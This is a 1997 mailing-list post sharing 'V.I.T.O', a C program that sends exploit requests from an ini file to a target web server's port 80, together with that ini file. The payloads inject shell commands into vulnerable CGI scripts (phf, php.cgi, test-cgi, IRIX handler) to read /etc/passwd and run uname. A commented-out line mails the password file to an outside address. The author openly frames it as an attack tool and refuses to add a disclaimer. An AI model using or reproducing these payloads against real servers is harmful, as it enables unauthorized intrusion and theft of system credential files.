V.I.T.O Stupid tool for Attac... testing web servers.

Francisco Torres (ftorres@CASTOR.JAVERIANA.EDU.CO)
Sun, 13 Jul 1997 22:35:53 -0500

V.I.T.O
Vicious Internet TOol (ET Lownoise etorres@cyberservices.com 1997)

Well is just a tool to test a web server.... isnta great thing just
made things easy. You can edit the ini file to put more web exploits.
Distribute freely and keep the author inside the code and the ini file.

The code has not a disclaimer because NOBODY READS A F***** DISCLAIMER.
You know what you do whit the code.

Read the comment in the code and most important edit the vito.ini file.

ET

Code:
-------- vito.c ---------------------- Cut Here ----- vito.c ---------
/* V.I.T.O
Vicious Internet TOol by ET Lownoise Colombia 1997.
Copyshit (:Q~) ET 1997.

Test (T.E.S.T!!!) a web server for interesting MUST NOT HAVE cgi's.
note that this program sucks too.

2 Files:
-Vito.c
-Vito.ini <---- you can edit this one....so u can upgrade
this program. Just follow the sintax.
etorres@cyberservices.com
Why is necesary a disclaimer when nobody reads it?.

Compile for dummies
===================
cc -o vito vito.c
Execute for dummies
===================
vito <host>
*/

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define TAMANO 1024

int sock;
struct sockaddr_in sock_dest;
char host_dest[100];

main(int argc,char *argv[])
{

FILE *ini; /*check for vito.ini*/

int a,
b,
c,
d,
x;

struct hostent *pastelito;

char buffer[TAMANO],
bufrec[TAMANO],
buftmp[TAMANO],
encabezado[50];

if (argc < 2) {
fprintf(stdout,"V.I.T.O by ET Lownoise 97\n");
fprintf(stdout,"Usage: %s <host> [> file]\n",argv[0]);
fprintf(stdout,"Note: I know this program sucks.. it\n");
fprintf(stdout," just make things easy.\n");
exit(0);
}

if((ini=fopen("vito.ini","r"))==NULL){
fprintf(stdout,"%s needs his ini file: vito.ini\n",argv[0]);
exit(0);
}

if (sscanf(argv[1],"%d.%d.%d.%d",&a,&b,&c,&d) != 4) {
pastelito = gethostbyname(argv[1]);
if (pastelito == NULL) {
fprintf(stdout,"Ahhhhhhh! cannot resolve host %s\n",argv[1]);
exit(0);
}
sprintf(host_dest,"%d.%d.%d.%d",(unsigned char ) pastelito->h_addr_list[0][0],
(unsigned char ) pastelito->h_addr_list[0][1],
(unsigned char ) pastelito->h_addr_list[0][2],
(unsigned char ) pastelito->h_addr_list[0][3]);
}
else {
strncpy(host_dest,argv[1],99);
}
fprintf(stdout,"V.I.T.O.\n");
fprintf(stdout,"Attac...Testing host: %s ",host_dest);

/*ET*/

sock_dest.sin_family = AF_INET;
sock_dest.sin_port = htons(80); /* www port */
sock_dest.sin_addr.s_addr = inet_addr(host_dest);

while(fgets(buffer,TAMANO,ini)!=NULL){ /*Buffer line size*/
if(buffer[0]=='['){
/* Buffer division*/
strcpy(buftmp,buffer);
strcpy(buffer,strchr(buftmp,'G'));
strncpy(encabezado,buftmp,strlen(buftmp)-strlen(buffer)+1);
encabezado[strlen(buftmp)-strlen(buffer)]='\0';

sock = socket(AF_INET,SOCK_STREAM,0);
if(sock < 0) {
fprintf(stdout,"ERROR: socket() failed\n");
exit(0);
}

x = connect(sock,(struct sockaddr *) &sock_dest,sizeof(sock_dest));
if(x < 0){
fprintf(stdout,"Upps.. can't connect to port 80\n");
}

fprintf(stdout,
"\n|-------------------------------------------------------------|\n");
fprintf(stdout," CGI: %s\n",encabezado);
fprintf(stdout," Sending.\n");
fprintf(stdout," %s",buffer);
fprintf(stdout,"|-------------------------------------------------------------|\n");
send(sock,buffer,TAMANO*sizeof(char),0);
bzero(buffer,TAMANO);
fprintf(stdout," Receiving.\n\n");
while((x=recv(sock,bufrec,TAMANO*sizeof(char),0))!=0){
fprintf(stdout,"%s",bufrec);
bzero(bufrec,TAMANO);
}
close(sock);
}
}
fclose(ini);
fprintf(stdout,
"\n|=============================================================|\n");
fprintf(stdout,"Vito End. ET Lownoise 1997\n");
}

-------------------- End vito.c --- cut here ----------------------
here comes the ini file: vito.ini
-------------------- vito.ini ----- cut here ----------------------

##############################################################
# V.I.T.O Et Lownoise 1997 Ini File. ver.1.0 #
##############################################################
# Please be carefull when u edit this file because some times
# the text editor u use break the lines.
# If u create a new line please use the GET in uppercase and
# if u whant to comment any line use #.
#
# Note: The space used in the IRIX line is a TAB no a space.
# and u cannot use %xx to replace them.
# Note: Modify the email address in the aglimpse line.
#
# etorres@cyberservices.com
#
##############################################################
# format: #
# [comment] GET exploit_line_here #
##############################################################

[phf passwd] GET /cgi-bin/phf?Qalias=hell%0acat%20/etc/passwd%0a
[phf uname] GET /cgi-bin/phf?Qalias=hell%0auname%20-a%0a
[finger] GET /cgi-bin/finger?%0a
[test-cgi cgis] GET /cgi-bin/test-cgi?%20*%0a
[test-cgi dirs] GET /cgi-bin/test-cgi?%20\*%0a
[php/fi] GET /cgi-bin/php.cgi?/etc/passwd
#[Access control on W3C httpd server] GET //secret/index.html
[IRIX handler <space is TAB>] GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=Download
#[mglimpse] GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5user\@et.com\</etc/passwd;eval$CMD;echo

#end of ini file PLEASE SEND ME SOME NEW VERSION OF THIS INI
#ET etorres@cyberservices.com

---------------- End vito.ini---- Cut here ---------------------
Reconstruct the ini file if your text editor modify it breaking the
long lines.

--------------------------- The END --------------------------

ET 1997